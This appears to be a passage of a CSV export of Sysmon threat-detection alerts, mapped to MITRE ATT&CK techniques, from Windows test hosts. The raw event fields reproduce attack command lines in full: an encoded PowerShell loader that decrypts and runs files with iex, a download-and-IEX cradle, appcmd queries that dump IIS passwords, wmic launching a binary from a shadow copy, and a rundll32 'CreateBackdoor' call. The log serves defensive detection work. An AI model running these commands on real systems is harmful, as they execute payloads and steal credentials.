SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-F41E-5D53-0000-001067C80300 4824 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5952 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.183 365ABB72-3D6F-5CEB-0000-001026B9FF00 1036 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," 1 5 4 1 0 0x8000000000000000 6188 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:54.428 365ABB72-FE76-5CEB-0000-0010546E0C00 2356 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," 1 5 4 1 0 0x8000000000000000 417079 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 11:43:36.303 747F3D96-D8E8-5F8A-0000-00102CEF7200 840 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\System32\rundll32.exe" C:\Users\IEUser\AppData\Roaming\ MSEDGEWIN10\IEUser 747F3D96-CA8D-5F8A-0000-0020D1090A00 0xa09d1 1 High SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-D8E5-5F8A-0000-0010E1BC7200 2920 C:\Users\IEUser\AppData\Roaming\WINWORD.exe C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," 1 5 4 1 0 0x8000000000000000 10674 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-14 12:17:14.447 747F3D96-FBCA-5D53-0000-0010B8664100 2476 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-F419-5D53-0000-002026910200 0x29126 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-F41E-5D53-0000-001067C80300 4824 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16496 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 17:01:31.380 365ABB72-516B-5CD8-0000-001087E41600 3788 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-4FB5-5CD8-0000-0020F2350100 0x135f2 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-502E-5CD8-0000-00102A330700 3192 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," 1 5 4 1 0 0x8000000000000000 6188 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:54.428 365ABB72-FE76-5CEB-0000-0010546E0C00 2356 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1," 1 5 4 1 0 0x8000000000000000 4348 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-26 07:39:14.345 747F3D96-AE22-5D3A-0000-001096B24E00 1504 C:\Windows\hh.exe 10.0.17763.1 (WinBuild.160101.0800) Microsoft® HTML Help Executable HTML Help Microsoft Corporation "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm C:\Users\IEUser\Desktop\ MSEDGEWIN10\IEUser 747F3D96-ABD5-5D3A-0000-0020EB990F00 0xf99eb 1 Medium SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C 747F3D96-ABD7-5D3A-0000-001012661000 4940 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243534 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.993 747F3D96-9F68-5E75-0000-0010B9662000 7420 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243534 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.993 747F3D96-9F68-5E75-0000-0010B9662000 7420 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243534 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:24.993 747F3D96-9F68-5E75-0000-0010B9662000 7420 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," 1 5 4 1 0 0x8000000000000000 5949 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.103 365ABB72-3D6F-5CEB-0000-001066B5FF00 2796 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1," 1 5 4 1 0 0x8000000000000000 4865 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:11:19.010 747F3D96-60F7-5D3F-0000-00106F2F5600 6160 C:\Windows\SysWOW64\wscript.exe 5.812.10240.16384 Microsoft ® Windows Based Script Host Microsoft ® Windows Script Host Microsoft Corporation "C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt C:\Users\IEUser\AppData\Local\Temp\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-0020B5314100 0x4131b5 1 Medium SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE 747F3D96-60F5-5D3F-0000-0010A8D75500 4884 C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," 1 5 4 1 0 0x8000000000000000 4910 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:23.170 747F3D96-6623-5D3F-0000-001011F68700 5816 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," 1 5 4 1 0 0x8000000000000000 4910 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:23.170 747F3D96-6623-5D3F-0000-001011F68700 5816 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe 